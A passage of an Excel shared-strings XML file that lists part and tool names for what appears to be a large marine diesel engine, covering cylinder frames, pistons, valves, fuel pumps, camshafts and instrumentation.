    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHIELD UPPER, WELDING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHIELD LOWER, WELDING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUARD-UPPER PART</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF GUARDS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CRANKC.COV.W.SAFETY VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF PISTON CLEAN. RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cylinder liner, with accessories</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Test of Cylinder Frame</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFT.TOOL F.RELIEF VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cylinder Frame-Welding</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cylinder Frame. Miscellany parts</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF STUDS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLEANING COVER COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRACING IN CAMSH,HOUSING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cut.Plan/Pl.List-Cyl. Frame</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COOLING JACKETS-MOUNTING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE FOR CHAIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WIRE F. LIFTING CYL.LINER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MEASURING TOOL F. CYL.LIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CROSS BAR F.CYL.LINER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFT TOOL F.CYL.LINER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>JIG+DRAWING TOOL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WEAR RIDGE MILL. MACHINE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOLS FOR MS-105</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cylinder cover, studs, etc.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Arr. of sleeve-starting valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Arr. of sleeve-safety valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Studs, safety valve Assy</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Arr. of sleeve-indicator valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Studs, indicator valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYLINDER COVER RACK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT.TOOL-VALVE SEAT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXTRACTOR-VALVE SEAT RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFTING TOOL-CYL.COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>JIG</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFTING CHAINS,CYL.COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GRIND MACHINE,LINER+COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MILL+GRIND.WH, FUEL VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MILL + GRIND.WH,ST.VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT F.MANUAL H.P.PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HYDR.TIGHT.RING COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPRING HOUSING CHECK.TOOL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INLET DUCT CROSS.SEC.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEST BED, FATIGUE MASHINE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT GEARWH.+THROW RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AUTOLOG,MEASURING TOOL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MEAS.INSTR.,AX.VIBR.DAMP.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOF FITTED BOLT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOLS FOR MS-07</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT. CHAINWH.CRANKSHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT. OF FLEX. GEARWHEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Connecting rod, assembly</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONNECTING ROD+CROSSHEAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BOOSTER PUMP FOR CONN.ROD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CRANK BEARING-UPPER PART-BLANK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CRANK BEARING-LOWER PART-BLANK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CRANK BEARING COMPLETE - BLANK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONN.ROD BRG.SHELL UPPER-BLANK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONN.ROD BRG.SHELL LOWER-BLANK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONN.ROD,BORING F.SHELLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFTING LEVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXTRACTING TOOL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFT.TOOL FOR CONN. ROD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE FORK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFT.TOOL,CRANKPIN SHELL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CHAIN-SUSPENDING X-HEAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOLS FOR MS-108</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONN. ROD BEARING, UPPER &amp; LOWER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Housing-stuffing box incl flange</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSTR.PLATE COUNT.WEIGHT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EYE NUT F.PISTON ROD STUD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOL F.MOUNTING OF SPRING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WORKTABLE TOPPLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXTRACTOR FOR GUIDE SHOE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TRANSPORT TOOL-CROSSHEAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EYE SCREW-LIFT.TOOL-XHEAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFTING TOOLS-CROSSHEAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSERT FOR PISTON LOWER P</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PISTON+PISTON ROD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PISTON WITH PIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PISTON RING, ASSY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PISTON RING, SELECT.TABLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Piston ring pack</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COLLAR F. LIFT. OF PISTON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WELDED SUPPORT RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CHAIN F.SUSPENDING PISTON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOLS FOR TILTED LIFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PISTON RING EXPANDER, SET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRESS TEST TOOLS (PARTS)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRESSURE TEST TOOL,PISTON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT IRON FOR PISTON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HYDR.JACK-PISTON ROD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOLS FOR MS-110</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYLINDER UNIT, SPARE PART</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEND</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OUTLET PI</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Outlet pipe, piston cooling</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SLIT PIPE COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOUSING-AIR RECEIVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE WITH FLANGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ORIFICE PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ROTATING MECHANISM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STUD, SCREW AND DISC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WASHER PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEALING AIR CONTROL UNIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEAL.AIR.CONTR.UNIT,COMPL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEALING 0IL CONTROL UNIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ACTUATOR COMPLETE, INVA</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PNEUM.EXH.VAL.AIR SUPPLY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ACTUATOR+THROTTLE VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ACTUATOR CYLINDER+PISTON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ACTUAT.COV.+FLOW CL.N.R.V</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VALVE SPINDLE ASSY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VALVE-MOUNTING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THRUST PIECE-MOUNT.TOOL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VALVE SEAT+SPIND GRINDER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WORKTABLE-EXHAUST VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HYDR.JACK-EXH.VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFTING TOOL, EXH.VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TABLE FOR WORKTABLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRAME FOR WORKTABLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEST RIG FOR SAFETY VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOL-DISM.EXH.V.BOT.PIECE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOL FOR HYDRAULIC PISTON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXTRACTOR F. EXH. BUSHING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXHAUST VALVE-REPAIR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Repair kit, sealings/gaskets</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Safety block arrangement</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLUG VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Accumulator block arrangement</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Safety and accu. block arr.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ELFI valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ELVA valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FIVA valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEST EQUIP. F ACCUMULATORS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>sealing tool, hydr. HP pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHUTDOWN VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL VALVE DUMMY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THRUST SPINDLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNTING OF SPINDLE+SLIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOLDER-FUEL NOZZLE COMPL.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONTROL DEVICE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>JET CONTROL SCREEN, ASSY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRESSURE TEST TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEST RIG - FUEL VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLEANING TOOL-ATOMIZER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MILL.TOOL-SEAT-F.OIL PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXTRACTOR-SPINDLE GUIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXTRACTOR+DRIFT, ATOMIZER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL GAS VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOLS FOR GAS VALVES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOLS F.GAS INJ.VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>START.AIR PIPE-SAFETY CAP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEST EQMT.,COMB.SAFETY V.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF CONTR. OIL HP-PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THRUST PIECE MOUNTING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ROCKER ARM COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ROLLER GUIDE W.ROLL.BEAR.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HYDRAULIC PIPE COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOSE COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PUNCTURE VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ROCKER ARMS MOUNTING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFTING TOOL,ROLLER GUIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFTING TOOL-ROLLER GUIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFT.TOOL-ROLL.G.FUEL P.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXTRACTOR F. SAFETY VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEST EQUIPMENT - ACTUATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL PUMP DRIVE ASSEMBLY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOLS F.PUNCTURE VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHAFT FOR REVERSING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLYWHEEL, CAMSHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CAMSHAFT-COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CAMSHAFT BEARING,MOUNTING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE TOOLS-CAMSHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PULLEY F.WIRE F.CAMSH.BRG</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFT ATTACH CAMSHAFT BRG.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FACE IMPACT WRENCH,FU.CAM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOLS-POLISHING OF CAMS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEARING-CAMSHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPES-STOP CYLINDER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ROLLER GUIDE BEARING FUEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INVA ACTUATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CHECK VALVE ARR.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLANGE SUSPENSION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL OIL SEALING ARR.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HYDR.JACK-CAMSHAFT BRG.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HYDR.JACK FUEL P.+EXH.ACT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOLS FOR MS-35</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT.OF CAMSHAFT BEARING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GEARBOX ASSEMBLY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Friction coupling, safety</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INTERMEDIATE SHAFT ASSY.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GEARBOX LOWERPART, WELDED</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GEARBOX UPPERPART, WELDED</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hydr.oil, Inlet/Outlet, low pres</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HYDR. SAFETY &amp; ACCU.BLOCK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hook wrench for accumulator</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flow cleaning, ME system</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CHAIN WHEEL ON CAMSHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CHAIN TIGHTENER MOUNTING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPRING WITH DATA PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TIGHTENING BOLT AND SHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GEAR FOR LUBRICATOR DRIVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT.OF GEARWHEEL DRIVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOLS FOR MS-103</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFT TOOL,HYDRAULIC MOTOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOLS FOR MS-112</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISTAN.PIECE-CHAIN TIGHT.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFT.TOOL-HYDR.MOTOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE FOR MOUNT. OF CHAIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CHAIN WHEEL, HYDR. JACKS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOLS F.EMERGENCY REVERS.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE - MILLING TOOL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT.GEARWHEEL+THROWRING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REPAIR CAMS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REPAIR CAM - EXHAUST</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REPAIR CAM - FUEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRACK.F.OIL MIST DETECTOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THRUST BEARING CONTROL MOUNT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CENTRAL LUBRICAT.CONTROL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REMOTE INDICATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRESSURE GAUGE PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSTRUMENTATION-SPECIAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EQUIPMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ORDERLIST OIL MIST DETECT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF THERMOSTAT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONNECTING POINTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUSPENSION-PRESS.CONVER.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT-OIL MIST DETECTOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Arrangement of junction box</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Instrumentation - junction box</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Arr. of splash oil monitoring</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSTR.PR.GAUGES &amp; THERM.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSTRUMENTATION-EL.COMP.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WIRING, EL. INSTRUMENTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PMI, SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PMI, CYL.PRESS.MONITORING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRACKET,PICK-UP BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Housing for Encoder</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRACKET, MOUNT.OF ENCODER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TACHOMETERS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VIBRALARM, TURBOCHARGER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VIBRATION MONITORING, T/C</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Arr. of junction box &amp; cableway</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>H.T. WATER PREHEATER BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF PRESS. TRANSMITTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT. OF PICK-UP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>P.BARREL+TOP COVER-COMPL.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL PUMP W.ACCUMULATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOPCOVER WITH PUNCT.VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PUMP HOUSING WITH PLUNGER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INTERMEDIATE PIECE COMPL.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DIVERSE DELE (ER UDG?ET).</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASSY OF SAFETY VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COMB.PUNCTURE+SUCT.VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Repair kit,</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFT.TOOL F.HYDR.PLUNGER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
